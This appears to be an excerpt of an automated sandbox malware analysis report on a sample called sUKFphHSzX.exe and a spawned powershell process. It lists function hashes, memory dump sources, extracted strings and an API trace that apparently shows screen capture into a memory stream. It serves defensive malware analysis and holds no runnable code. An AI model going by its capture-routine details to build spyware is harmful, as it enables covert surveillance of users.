API String ID:
Opcode ID: 3df66d4cc9dd87a6212816074e3aeaf5fa09f00ea093af0c8d2d76381b00b5f5
Instruction ID: c75c0336c27d87892e7a3166c67b264dd9573479e8a6be158c48d1420f0d26e2
Opcode Fuzzy Hash: 3df66d4cc9dd87a6212816074e3aeaf5fa09f00ea093af0c8d2d76381b00b5f5
Instruction Fuzzy Hash: 5AF046312057404FC702C768D844EAFBFF5EFCA620B00056ED14ECB252CE205C45CB22

Function 02EBE110 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09035530baaa85e73bd0aea85d2faa50e289185f8b38df7c4188157494130d8b
Instruction ID: 49bd5f9835052756e441c0d471bf8d0da7bafdfd705c94ef566c13d10c975b07
Opcode Fuzzy Hash: 09035530baaa85e73bd0aea85d2faa50e289185f8b38df7c4188157494130d8b
Instruction Fuzzy Hash: A3F02E326447145F8717D65DAC108EF7B6ADDCB27278484ABE04DCB241DB509D06CBF2

Function 02EB93B0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 834f68ef34065b38da96b62a915feaee208b3cc1c0d5ff61bc66cfec3da99bee
Instruction ID: 2bdaf64cf5c30a14ebace11486bf36ab0cbc3f1c609a1e64b83ad06043d048d1
Opcode Fuzzy Hash: 834f68ef34065b38da96b62a915feaee208b3cc1c0d5ff61bc66cfec3da99bee
Instruction Fuzzy Hash: 83F0F672A546005FD315AB78D4143EB7BAAEFD6315F1484AAD8054B385CE393C06CFB1

Function 02EBC200 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a6ced3ec68b720bd1bd2a15ba2bff357e7ab0b4ed1d88b82e057abd198c878
Instruction ID: 6cfdeb57f59d63d1197de1830bf6af4678977b977efaa27b330f47ba64020d5c
Opcode Fuzzy Hash: 11a6ced3ec68b720bd1bd2a15ba2bff357e7ab0b4ed1d88b82e057abd198c878
Instruction Fuzzy Hash: CFF0BE327083645FD7008AAA9C84DBBBFEDEFC9620B14807AF944C3351CAB0CC0086A0

Function 02DDD9A7 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532392170.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f7b8edb5f8cd5177f1034c242b105bbb3a5a2f4e5ad468d5261868057bf372
Instruction ID: 5b3f9b070c1ab920df019b85b791a9b8348d9cdb8c6909b59b5f56df77dd0dc9
Opcode Fuzzy Hash: a6f7b8edb5f8cd5177f1034c242b105bbb3a5a2f4e5ad468d5261868057bf372
Instruction Fuzzy Hash: FCF0F976200604AF97608F0AD985C23FBAEEBD4674719C55AE84A8B712C771FC41CEA0

Function 02EBE2C0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffee215e80e1ea0f0ff207029e5b430bae071f62722f5686b9fd0ffaa0389630
Instruction ID: b03698cea859d4fc926c6e00bdfdc54ee606eb31e86d9a09bff6d4c492b5b8cf
Opcode Fuzzy Hash: ffee215e80e1ea0f0ff207029e5b430bae071f62722f5686b9fd0ffaa0389630
Instruction Fuzzy Hash: AEF082353142408FC3058F1DD8949A6BBF9EFCF61535920D9E085CB332DAA1DC02CBA0

Function 02DDD998 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532392170.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ddd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fdcc4ef4d1b950cef77a6135b3712a099f5b4e45f8672522ad800f5aabc733
Instruction ID: 832d4028963cb26f8fd278685b262b61ecc2f7f3d24be971fa8cf491996d9dcd
Opcode Fuzzy Hash: 77fdcc4ef4d1b950cef77a6135b3712a099f5b4e45f8672522ad800f5aabc733
Instruction Fuzzy Hash: 6FF01D76100A40AFD765CF06CD85D23BBBAEBC5624B19848DE85A8B752C771FC42CFA0

Function 02EB9430 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dbd6d55fd40253af8464003692757d9d9e715ab5de7b113ab59e20e5bc63978
Instruction ID: 50913be2f4114596dae2a0218e9f7ff2dc3cfbca68e570a3a37b638162f77637
Opcode Fuzzy Hash: 5dbd6d55fd40253af8464003692757d9d9e715ab5de7b113ab59e20e5bc63978
Instruction Fuzzy Hash: F8F054719153408FD7619B78E4A83DA7FE1EB41311F04489ED18AC7242CB356985CB61

Function 02EB7C10 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 434cf06cb65d5cfedca32f938c412a1fa99fe4191ebc4876643644fa22df3398
Instruction ID: 14bd0628d1644d07ee740394c8a93ae44015ac30c8280691d4689d2d8a1e1ee2
Opcode Fuzzy Hash: 434cf06cb65d5cfedca32f938c412a1fa99fe4191ebc4876643644fa22df3398
Instruction Fuzzy Hash: E9F027313007145FC7109A59D840AAFB7EAEBC8A21F40042DE10EC3300CF70AC418B61

Function 02EB93C0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b71c4679dbc75915c40a16b86b9387100f347b49d127bd1f3345bc8f2276120
Instruction ID: 0d3d0ce940fd6b10cf3d73c2f3bebbea72c5082d25962ca40ad0491b21fe6194
Opcode Fuzzy Hash: 7b71c4679dbc75915c40a16b86b9387100f347b49d127bd1f3345bc8f2276120
Instruction Fuzzy Hash: C2F0E2316405044BD354AB68D0183AB7BDAEFC1315F20816AD90547384CE392C058FE1

Function 02EB793F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e67a436d88510fdffa2101e0a47ea9b6d2e7f60a817a4e4e3316dcef56b92890
Instruction ID: a9d7de1f532ea880d8e3fb127bb14a5b820655246b075f6f1773b25bfee8cef1
Opcode Fuzzy Hash: e67a436d88510fdffa2101e0a47ea9b6d2e7f60a817a4e4e3316dcef56b92890
Instruction Fuzzy Hash: 5BF0E576300604CFDB00DBA8D850BAAB7E2EFCD765B1681A8E909CB711DF30DC024B91

Function 02EB8C2A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7064b84634660b08d248f87b12d0f4ec1a5d2306ed016d024da37857cdcd3df5
Instruction ID: 1b65518c584003d5c3d194cf1b93edcd1e2d6e09aa2b7dcc1ad069b7fa9715c4
Opcode Fuzzy Hash: 7064b84634660b08d248f87b12d0f4ec1a5d2306ed016d024da37857cdcd3df5
Instruction Fuzzy Hash: 00F082357083909BCB172775A42C2AE7F62EF86326F05019EE54587243CF6808468BA6

Function 02EBE2D0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05716decaf9687f158311bc6ae1dde75f20ed23e6ffe07088fff1df9c23394c6
Instruction ID: ff6106bbc9a6abb0d1b1ca4110891a66d256271f7d9e18554cbf848d9f36da78
Opcode Fuzzy Hash: 05716decaf9687f158311bc6ae1dde75f20ed23e6ffe07088fff1df9c23394c6
Instruction Fuzzy Hash: 73E065353102108F82049B1DD488DAAB7EAEFCE62935950A9E589CB321CFA1EC018B90

Function 02EBB268 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c69b174ceecce3d893564460280d62f897c65a82af1c45a2f0dc2d02778bb4
Instruction ID: 80b612d1cb6caeac109cb3c6832e88e8c05e58a0567ed9441bc91315849b4199
Opcode Fuzzy Hash: 22c69b174ceecce3d893564460280d62f897c65a82af1c45a2f0dc2d02778bb4
Instruction Fuzzy Hash: 5FE0DF72B583900B8B1B8179AC604A67B678FE7128309C8BEE488CB242DD11880683A0

Function 02EB9440 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc8209ed545d830760e4565857d44a86ff9d7c6763975fdcf0b1cd3ed34708a
Instruction ID: d193df6f0651c4934157ed66856d29bc1c90d03448f7441d53fe482ac0e03305
Opcode Fuzzy Hash: abc8209ed545d830760e4565857d44a86ff9d7c6763975fdcf0b1cd3ed34708a
Instruction Fuzzy Hash: 1EF0C970A007049FD7649B79E49C79B7BE5EB45315F00446DD65EC7341DB3968848B90

Function 02EB9821 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b255ce8ce0965870a5b44bccf679a5e57d419d836c9bc3ad7e9fa963fcff8967
Instruction ID: ddf8401a17080d1031b201e25502e2c6189009d82064e07788b8a0197a8fc0f7
Opcode Fuzzy Hash: b255ce8ce0965870a5b44bccf679a5e57d419d836c9bc3ad7e9fa963fcff8967
Instruction Fuzzy Hash: 63E02B26BD0011174A96E1EA9D107FB71CFCEC61A9304A03AAF04D3301DE30DC0487F0

Function 02EB8C38 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a923140799005070633de7c1cc742b878d7f577896475f746806f622ec072ac
Instruction ID: 3596713b2447df7d082028850f8575613ea6b60436b73bfdef9d916b6e3b9878
Opcode Fuzzy Hash: 8a923140799005070633de7c1cc742b878d7f577896475f746806f622ec072ac
Instruction Fuzzy Hash: C6E0DF3530461097CB1A2B79B42C2AE7A56EBC4722F00002EE60683342CF6828418BE9

Function 02EBE170 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 62fa29df702d48d3344b7d2ef8432293b1a2a102ba3a4cee88d7db3ec7901974
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 8FE08631B00014978B0995A9D4104D9F7A9DFCC220F44C47AD90EA7340DA325916C6D1

Function 02EBE120 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c24e390e2f27885fcca4a290170700e4035512bfc024b1af7885dc1f0293a13
Instruction ID: dbb702f053a9c06dc76c58c7adbb58eeb291902f2924f123019b358262cef08a
Opcode Fuzzy Hash: 7c24e390e2f27885fcca4a290170700e4035512bfc024b1af7885dc1f0293a13
Instruction Fuzzy Hash: 8EE0C231700B145B8626A62EAC1099FB7DBDEC6A71794C46EE01AC7300DFA0DC428BA6

Function 02EB9828 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955ca83281a18e26da69232dc8862518f21d4a7143bec8767594ddc551a129b2
Instruction ID: f8e67798ad08e65790ebcef72a7c9448bba3c02b1d3965a6e677b50e43716867
Opcode Fuzzy Hash: 955ca83281a18e26da69232dc8862518f21d4a7143bec8767594ddc551a129b2
Instruction Fuzzy Hash: FBD05E167D0125174996A1EA2D107FBA1CFCEC65AA705A13AAE08D3342EE60DC0547F1

Function 02EB89F9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f07e833cd49c953c89506e672e729f5ef0761b337ab1ae9c7bcca7eb63df89b
Instruction ID: 87a44893a53e6cc4c24f155462dd0a2cc06b833556b2f1a8ec97f024d8f1667b
Opcode Fuzzy Hash: 2f07e833cd49c953c89506e672e729f5ef0761b337ab1ae9c7bcca7eb63df89b
Instruction Fuzzy Hash: 6DE04F31914149CBCB09EBA4ED6E4EEBB34EA11302B4041AEDA1392192DA311686CFD0

Function 02EB8AC0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f04bde7dfc5b5f989aa5307987ab8eb492d8e81291b7b9d4900ddd4ca81b02
Instruction ID: 15d4929babaa2cf97d6b6ae19a86196da52173a94ac9b56153d4b5ff4f67cc32
Opcode Fuzzy Hash: f1f04bde7dfc5b5f989aa5307987ab8eb492d8e81291b7b9d4900ddd4ca81b02
Instruction Fuzzy Hash: 93E0DF35E1824A8BCB14CBB4E4966EEBFB0EB06202B0042ACDE45AB342C6304842CF80

Function 02EBF8E0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac3c890d0c6965c8d9caff098428d6f7ef18c27e6c27349b6b4cc451cbb163a3
Instruction ID: 2551b42f7db234794125a2f5bbcd9f91fe5877adb9b84112f3eb5205c4b7e7f3
Opcode Fuzzy Hash: ac3c890d0c6965c8d9caff098428d6f7ef18c27e6c27349b6b4cc451cbb163a3
Instruction Fuzzy Hash: D7E01A70D4020AAF8780DFA9C94269AFFF4EF49240F14C4AE995DE3311E6329613CB91

Function 02EBF8F0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 518fb59a1287ba5ccf6de2dac6799c61eb397a7b6ae7807992381b831a85ac56
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: F1D06270D04209AF8780DFEDC9415AEFBF4EF49200F50C5AA9919E7301E7319612CBD1

Function 02EB8AD0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050d01c15b597e9d3d19151a44ce1ab401e3a6c0733624f5177342a3e04119d8
Instruction ID: d5e59800caa56d8c15a3f452ac8d4cc3122b9497b366b2e6060a5cd9b7bf9068
Opcode Fuzzy Hash: 050d01c15b597e9d3d19151a44ce1ab401e3a6c0733624f5177342a3e04119d8
Instruction Fuzzy Hash: 6ED01234904209DBC718DFA4E45A5AEBBB8EB44201F00415DD91593341DA305C41CFC0

Function 02EB8A08 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c228350a5692a830974e6cf1dfaff5b4f9bcfe661d067eb37fda28c5378b00
Instruction ID: fdcc9444b4d0d7110b2f4663a1ad38fbf08b34ff73c56164d974e1db4f44d3de
Opcode Fuzzy Hash: d2c228350a5692a830974e6cf1dfaff5b4f9bcfe661d067eb37fda28c5378b00
Instruction Fuzzy Hash: 33D06731904109CBCB59EBA4F86E4FEBB34FA14302F40416ED91762292EA315A9ACBC1

Function 02EB7BDA Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa903f90685a85f1ca232fd4c872272f6c619320524e3d15604a797369da2616
Instruction ID: d46f81f83d6a46614734ea91480e3755488a819c9bba9eaad0520666a7ca539e
Opcode Fuzzy Hash: aa903f90685a85f1ca232fd4c872272f6c619320524e3d15604a797369da2616
Instruction Fuzzy Hash: 42D0C9700497C15FC7579F3D94954143F20AE5321534509EFE59A8E1A7C6368994CB02

Function 02EB8150 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c7d77faae0d81542b4c18fb8531013b645fd8ddbdc6632d0a7423c8518c615
Instruction ID: 56f4d8916489c1b76056e4580f9427a4d21662903bc2afce8a31a3d99bec1a48
Opcode Fuzzy Hash: 92c7d77faae0d81542b4c18fb8531013b645fd8ddbdc6632d0a7423c8518c615
Instruction Fuzzy Hash: 2DC04C1440F7D01FDF03973499996117FB1498351930A44C6C185CF567C4A98849C713

Function 02EB7BE8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cede0f0d3ff2125c7e3c7004742366b52d0a612c850a0d1a5fad930fa8f4475
Instruction ID: 9dc1277e8b919ba901dbd549009002a2750cf73d7fd9f4919a4b13f27f729043
Opcode Fuzzy Hash: 3cede0f0d3ff2125c7e3c7004742366b52d0a612c850a0d1a5fad930fa8f4475
Instruction Fuzzy Hash: 0FB092300847088FC788AF7AA4048187769FA4171578114E9E52A0A2968E36E880CE85

Function 02EBE0EF Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
Instruction ID: 7ee32d8934d44c2d095a2652426353b9d72d13007a566c63e7a3114227a20a66
Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
Instruction Fuzzy Hash: C0B01236E44008C5DF00CBC4F0003EDB770EB80236F084073D60C624008330026986A2

Function 02EBE0F8 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1532699693.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
Instruction ID: 7ee32d8934d44c2d095a2652426353b9d72d13007a566c63e7a3114227a20a66
Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
Instruction Fuzzy Hash: C0B01236E44008C5DF00CBC4F0003EDB770EB80236F084073D60C624008330026986A2

Non-executed Functions

Function 07301BE0 Relevance: 12.9, Strings: 10, Instructions: 402COMMON

Download Yara Rule

Strings

84Hl, xrefs: 07301F76
84Hl, xrefs: 07301F6C
JKl, xrefs: 07302017
rJl, xrefs: 07301C53
JKl, xrefs: 0730200B
JKl, xrefs: 073020CE
rJl, xrefs: 07301C5D
JKl, xrefs: 07301FA1
$c=k, xrefs: 073020B4
JKl, xrefs: 073020C2

Memory Dump Source

Source File: 00000003.00000002.1538168919.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: $c=k$84Hl$84Hl$JKl$JKl$JKl$JKl$JKl$rJl$rJl
API String ID: 0-3387687167
Opcode ID: 2bb54d81447669fe5f00afaca9e91483cf6c6d542e20c970ae4a73fd84f9a2a7
Instruction ID: d4015e920016cb94b5cab332d56aee4811d4509c960db4e011e76d9aa098d31d
Opcode Fuzzy Hash: 2bb54d81447669fe5f00afaca9e91483cf6c6d542e20c970ae4a73fd84f9a2a7
Instruction Fuzzy Hash: EDD10AB1B0434A8FEB15DB68842476FBBB5BFC6310F1480ABD5599B296DB31C841C7D2

Function 073033D8 Relevance: 5.1, Strings: 4, Instructions: 134COMMON

Download Yara Rule

Strings

p5:k, xrefs: 0730344F
RJl, xrefs: 0730342B
,SJl, xrefs: 0730345D
,SJl, xrefs: 07303469

Memory Dump Source

Source File: 00000003.00000002.1538168919.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: ,SJl$,SJl$p5:k$RJl
API String ID: 0-4169027764
Opcode ID: a467a40102057985e44b7564e6cf4e9062c666e203e389f42c52e947f57950f4
Instruction ID: eb302e3cc6a2d98a8ae1af3b2cb5d9b69a58e903d8df117aa470586a416fc3a5
Opcode Fuzzy Hash: a467a40102057985e44b7564e6cf4e9062c666e203e389f42c52e947f57950f4
Instruction Fuzzy Hash: A84156F1B043159FE721DB699821BAABBE59F86210F1480BFD549DF681DA31C881C7E2

Function 07302208 Relevance: 5.1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

Strings

lc=k, xrefs: 07302237
JKl, xrefs: 07302251
JKl, xrefs: 07302245
JKl, xrefs: 073022A4

Memory Dump Source

Source File: 00000003.00000002.1538168919.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: lc=k$JKl$JKl$JKl
API String ID: 0-2583898804
Opcode ID: e4c8656eaaa1d14cb4752bc5d8593ce6348c43865143d13f74c128ced1c28a83
Instruction ID: c3b4fba1a216526817d1aca530dce712b579bb4b075b7d180a39966f474c4335
Opcode Fuzzy Hash: e4c8656eaaa1d14cb4752bc5d8593ce6348c43865143d13f74c128ced1c28a83
Instruction Fuzzy Hash: C81122A120D3E45FE75383B40824AA33F6A2FC760171948D7C194AFA97C4648D86C3F6

Analysis Process: sUKFphHSzX.exePID: 1440, Parent PID: 7796COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	83.1%
Signature Coverage:	5.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 000002093355FB30 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 225
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 000002093355FB71
GetSystemMetrics.USER32 ref: 000002093355FB7F
GetSystemMetrics.USER32 ref: 000002093355FB8D
GetSystemMetrics.USER32 ref: 000002093355FB9B
GetDC.USER32 ref: 000002093355FBA5
GetDeviceCaps.GDI32 ref: 000002093355FBBB
GetDeviceCaps.GDI32 ref: 000002093355FBCB
CreateCompatibleDC.GDI32 ref: 000002093355FBD8
CreateCompatibleBitmap.GDI32 ref: 000002093355FBF0
SelectObject.GDI32 ref: 000002093355FC06
BitBlt.GDI32 ref: 000002093355FC3C
SHCreateMemStream.SHLWAPI ref: 000002093355FC72
SelectObject.GDI32 ref: 000002093355FC88
DeleteDC.GDI32 ref: 000002093355FC91
ReleaseDC.USER32 ref: 000002093355FC9C
DeleteObject.GDI32 ref: 000002093355FCA5
EnterCriticalSection.KERNEL32 ref: 000002093355FD9C
LeaveCriticalSection.KERNEL32 ref: 000002093355FDAE
IStream_Size.SHLWAPI ref: 000002093355FDE5
IStream_Reset.SHLWAPI ref: 000002093355FDF6
IStream_Read.SHLWAPI ref: 000002093355FE7B
SelectObject.GDI32 ref: 000002093355FED5
DeleteDC.GDI32 ref: 000002093355FEDE
ReleaseDC.USER32 ref: 000002093355FEEB
DeleteObject.GDI32 ref: 000002093355FEF4

Strings

, xrefs: 000002093355FC11

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

